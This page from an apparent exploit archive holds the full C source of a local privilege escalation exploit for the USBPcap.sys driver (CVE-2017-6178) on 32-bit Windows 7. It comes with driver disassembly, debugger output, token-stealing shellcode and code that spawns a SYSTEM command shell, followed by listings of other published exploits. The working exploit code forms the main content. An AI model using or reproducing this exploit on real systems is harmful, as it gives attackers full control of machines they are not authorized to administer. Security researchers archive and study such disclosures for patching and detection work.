Menu

Search for hundreds of thousands of exploits

"USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation"

Author

Exploit author

"Parvez Anwar"

Platform

Exploit platform

windows

Release date

Exploit published date

2017-03-07

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
/*

Exploit Title    - USBPcap Null Pointer Dereference Privilege Escalation
Date             - 07th March 2017
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://desowin.org/usbpcap/ 
Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
Driver Version   - 1.1.0.0 - USBPcap.sys
Tested on OS     - 32bit Windows 7 SP1 
CVE ID           - CVE-2017-6178
Vendor fix url   - not yet
Fixed Version    - 0day
Fixed driver ver - 0day


USBPcap.sys
-----------

.text:992AF494 loc_992AF494:                                                         
.text:992AF494                 mov     ecx, [edi+8]                                  ; DeviceObject
.text:992AF494                                                                       
.text:992AF497                 inc     byte ptr [esi+23h]
.text:992AF49A                 add     dword ptr [esi+60h], 24h
.text:992AF49E                 mov     edx, esi                                      ; Irp
.text:992AF4A0                 call    ds:IofCallDriver                              ; IofCallDriver function called without validating values !!!
.text:992AF4A6                 push    18h                                           ; RemlockSize
.text:992AF4A8                 push    esi                                           ; Tag
.text:992AF4A9                 push    ebx                                           ; RemoveLock
.text:992AF4AA                 mov     edi, eax
.text:992AF4AC                 call    ds:IoReleaseRemoveLockEx
.text:992AF4B2                 mov     eax, edi



kd> u nt!IofCallDriver
.
.
.
82a7111b eb0c            jmp     nt!IofCallDriver+0x63 (82a71129)
82a7111d 8b4608          mov     eax,dword ptr [esi+8] ds:0023:00000008=????????        <------------ null pointer dereference
82a71120 52              push    edx
82a71121 0fb6c9          movzx   ecx,cl
82a71124 56              push    esi
82a71125 ff548838        call    dword ptr [eax+ecx*4+38h]                              <------------ control flow of execution
82a71129 5e              pop     esi
82a7112a 59              pop     ecx
82a7112b 5d              pop     ebp
82a7112c c3              ret


*/



#include <stdio.h>
#include <windows.h>

#define BUFSIZE 4096


typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
     IN HANDLE ProcessHandle,
     IN OUT PVOID *BaseAddress,
     IN ULONG ZeroBits,
     IN OUT PULONG RegionSize,
     IN ULONG AllocationType,
     IN ULONG Protect);



// Windows 7 SP1

#define W7_KPROCESS 0x50      // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN    0xf8      // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID     0xb4      // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS  0xb8      // Offset to ActiveProcessLinks _EPROCESS struct


BYTE token_steal_w7[] =
{
  0x60,                                                  // pushad                         Saves all registers
  0x64,0xA1,0x24,0x01,0x00,0x00,                         // mov eax, fs:[eax+124h]         Retrieve ETHREAD
  0x8b,0x40,W7_KPROCESS,                                 // mov eax, [eax+W7_KPROCESS]     Retrieve _KPROCESS
  0x8b,0xc8,                                             // mov ecx, eax                   Current _EPROCESS structure
  0x8b,0x98,W7_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+W7_TOKEN]        Retrieves TOKEN
  0x8b,0x80,W7_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+W7_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
  0x81,0xe8,W7_APLINKS,0x00,0x00,0x00,                   // sub eax, W7_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
  0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+W7_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
  0x75,0xe8,                                             // jne                     ---- 
  0x8b,0x90,W7_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+W7_TOKEN]        Retrieves TOKEN and stores on EDX
  0x89,0x91,0xF8,0x00,0x00,0x00,                         // mov [ecx+W7_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
  0x61,                                                  // popad                          Restores all registers
  0x83,0xc4,0x18,                                        // add esp,18
  0xc3                                                   // ret 
};





void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;


    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);

    si.cb          = sizeof(si); 
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
       printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
       return;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}



int main(int argc, char *argv[]) 
{

    _NtAllocateVirtualMemory    NtAllocateVirtualMemory;
    LPVOID                      addrtoshell;
    NTSTATUS                    allocstatus;
    LPVOID                      base_addr = (LPVOID)0x00000001;                     
    DWORD                       written;
    int                         rwresult;
    int                         size = BUFSIZE; 
    HANDLE                      hDevice;
    DWORD                       dwRetBytes = 0;    
    unsigned char               buffer[BUFSIZE];    
    unsigned char               devhandle[MAX_PATH]; 



    printf("-------------------------------------------------------------------------------\n");
    printf("           USBPCAP (usbpcap.sys) Null Pointer Dereference EoP Exploit          \n");
    printf("                        Tested on Windows 7 SP1 (32bit)                        \n");
    printf("-------------------------------------------------------------------------------\n\n");


    sprintf(devhandle, "\\\\.\\%s", "usbpcap1");

    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if(addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc memory allocation failure %.8x\n\n", GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc memory allocated at %p\n", addrtoshell);

    memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));
    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));

    NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
 	
    if (!NtAllocateVirtualMemory)
    {
        printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
        return -1;  
    }

    printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
    printf("[+] Allocating memory at [0x%p]\n", base_addr);
	 
    allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (allocstatus) 
    {
        printf("[-] An error occured while mapping executable memory (0x%08x) %d\n\n", allocstatus, GetLastError());
        return -1;
    }
    printf("[+] NtAllocateVirtualMemory successful\n");

    memset(buffer, 0x00, BUFSIZE);
    memcpy(buffer+0x0000006b, &addrtoshell, 4);

    rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);

    if (rwresult == 0)
    {
        printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
        return -1;
    }
    printf("[+] WriteProcessMemory %d bytes written\n", written);  

    printf("[+] Device handle %s\n", devhandle);
    
    hDevice = CreateFile(devhandle, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else 
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    printf("[~] Press any key to send Exploit  . . .\n");
    getch();

    DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL);

    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    spawnShell();

    return 0;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-01-14 "Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation" local windows "Parvez Anwar"
2018-09-13 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation" local windows "Parvez Anwar"
2018-01-30 "System Shield 5.0.0.136 - Privilege Escalation" local windows "Parvez Anwar"
2017-11-13 "IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation" local windows "Parvez Anwar"
2017-11-01 "Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Local Privilege Escalation" local windows "Parvez Anwar"
2017-10-26 "Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference" dos windows "Parvez Anwar"
2017-03-07 "USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation" local windows "Parvez Anwar"
2017-01-26 "Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow" local windows "Parvez Anwar"
2015-02-11 "SoftSphere DefenseWall FW/IPS 3.24 - Local Privilege Escalation" local windows "Parvez Anwar"
2015-02-04 "K7 Computing (Multiple Products) - Arbitrary Write Privilege Escalation" local windows "Parvez Anwar"
2015-02-04 "AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation" local windows "Parvez Anwar"
2015-02-04 "BullGuard (Multiple Products) - Arbitrary Write Privilege Escalation" local windows "Parvez Anwar"
2015-02-01 "Symantec Altiris Agent 6.9 (Build 648) - Local Privilege Escalation" local windows "Parvez Anwar"
2015-01-31 "Trend Micro 8.0.1133 (Multiple Products) - Local Privilege Escalation" local windows "Parvez Anwar"
2015-01-30 "McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation" local windows "Parvez Anwar"
2015-01-26 "Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation" local windows "Parvez Anwar"
2015-01-20 "Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service" dos windows "Parvez Anwar" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected